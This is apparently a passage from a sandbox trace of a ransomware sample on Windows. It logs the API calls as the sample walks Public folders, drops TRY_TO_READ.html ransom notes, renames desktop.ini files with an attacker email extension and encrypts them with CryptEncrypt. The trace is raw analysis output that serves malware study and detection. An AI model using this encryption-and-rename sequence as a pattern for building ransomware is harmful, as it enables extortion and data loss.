lstrcatW (in: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.628] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.630] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0161.630] GetProcessHeap () returned 0x2e0000 [0161.630] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0161.630] GetFileSizeEx (in: hFile=0x4fc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=88) returned 1 [0161.630] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x58 [0161.630] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.630] GetProcessHeap () returned 0x2e0000 [0161.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.630] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.631] WriteFile (in: hFile=0x4fc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.632] WriteFile (in: hFile=0x4fc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.632] WriteFile (in: hFile=0x4fc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.632] ReadFile (in: hFile=0x4fc, lpBuffer=0x314040, nNumberOfBytesToRead=0x58, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x314040*, lpNumberOfBytesRead=0x2acf9c8*=0x58, lpOverlapped=0x0) returned 1 [0161.632] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=-88, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.632] WriteFile (in: hFile=0x4fc, lpBuffer=0x3140a0*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3140a0*, lpNumberOfBytesWritten=0x2acf9c8*=0x58, lpOverlapped=0x0) returned 1 [0161.632] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Music\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1428 [0161.632] FindNextFileW (in: hFindFile=0x3b1428, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.634] FindNextFileW (in: hFindFile=0x3b1428, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.634] FindNextFileW (in: hFindFile=0x3b1428, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0161.634] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\music\\sample music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x500 [0161.637] FindNextFileW (in: hFindFile=0x3b1428, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979671d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b4e830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.637] FindNextFileW (in: hFindFile=0x3b1428, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979671d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b4e830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.637] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.637] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.637] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.637] lstrlenW (lpString="C:\\\\Users\\Public\\Music\\desktop.ini") returned 34 [0161.637] GetProcessHeap () returned 0x2e0000 [0161.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xaa) returned 0x33b3e8 [0161.638] lstrcpyW (in: lpString1=0x33b3e8, lpString2="C:\\\\Users\\Public\\Music\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini") returned="C:\\\\Users\\Public\\Music\\desktop.ini" [0161.638] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.638] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.640] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x500 [0161.640] GetProcessHeap () returned 0x2e0000 [0161.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33b3e8 | out: hHeap=0x2e0000) returned 1 [0161.640] GetFileSizeEx (in: hFile=0x500, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=380) returned 1 [0161.640] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x17c [0161.640] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.640] GetProcessHeap () returned 0x2e0000 [0161.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.640] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.640] WriteFile (in: hFile=0x500, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.641] WriteFile (in: hFile=0x500, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.641] WriteFile (in: hFile=0x500, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.641] ReadFile (in: hFile=0x500, lpBuffer=0x30a498, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.641] SetFilePointer (in: hFile=0x500, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.641] WriteFile (in: hFile=0x500, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.641] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Pictures\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1468 [0161.642] FindNextFileW (in: hFindFile=0x3b1468, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.642] FindNextFileW (in: hFindFile=0x3b1468, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.642] FindNextFileW (in: hFindFile=0x3b1468, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0161.642] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\pictures\\sample pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0161.645] FindNextFileW (in: hFindFile=0x3b1468, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979671d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b4e830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.645] FindNextFileW (in: hFindFile=0x3b1468, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979671d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b4e830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.645] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.645] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.645] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.645] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\desktop.ini") returned 37 [0161.645] GetProcessHeap () returned 0x2e0000 [0161.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33b3e8 [0161.645] lstrcpyW (in: lpString1=0x33b3e8, lpString2="C:\\\\Users\\Public\\Pictures\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini") returned="C:\\\\Users\\Public\\Pictures\\desktop.ini" [0161.645] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.645] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.649] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0161.649] GetProcessHeap () returned 0x2e0000 [0161.649] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33b3e8 | out: hHeap=0x2e0000) returned 1 [0161.649] GetFileSizeEx (in: hFile=0x504, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=380) returned 1 [0161.649] SetFilePointer (in: hFile=0x504, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x17c [0161.649] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.649] GetProcessHeap () returned 0x2e0000 [0161.649] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.649] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.649] WriteFile (in: hFile=0x504, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.650] WriteFile (in: hFile=0x504, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.650] WriteFile (in: hFile=0x504, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.650] ReadFile (in: hFile=0x504, lpBuffer=0x30a498, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.650] SetFilePointer (in: hFile=0x504, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.650] WriteFile (in: hFile=0x504, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.651] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b14a8 [0161.651] FindNextFileW (in: hFindFile=0x3b14a8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.651] FindNextFileW (in: hFindFile=0x3b14a8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.651] FindNextFileW (in: hFindFile=0x3b14a8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0161.651] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\Sample Media\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\recorded tv\\sample media\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x508 [0161.654] FindNextFileW (in: hFindFile=0x3b14a8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979671d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.654] FindNextFileW (in: hFindFile=0x3b14a8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979671d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.654] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.654] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.654] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.655] lstrlenW (lpString="C:\\\\Users\\Public\\Recorded TV\\desktop.ini") returned 40 [0161.655] GetProcessHeap () returned 0x2e0000 [0161.655] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb6) returned 0x34af58 [0161.655] lstrcpyW (in: lpString1=0x34af58, lpString2="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini") returned="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" [0161.655] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.655] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.659] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\recorded tv\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x508 [0161.659] GetProcessHeap () returned 0x2e0000 [0161.659] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0161.659] GetFileSizeEx (in: hFile=0x508, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=80) returned 1 [0161.659] SetFilePointer (in: hFile=0x508, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x50 [0161.659] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 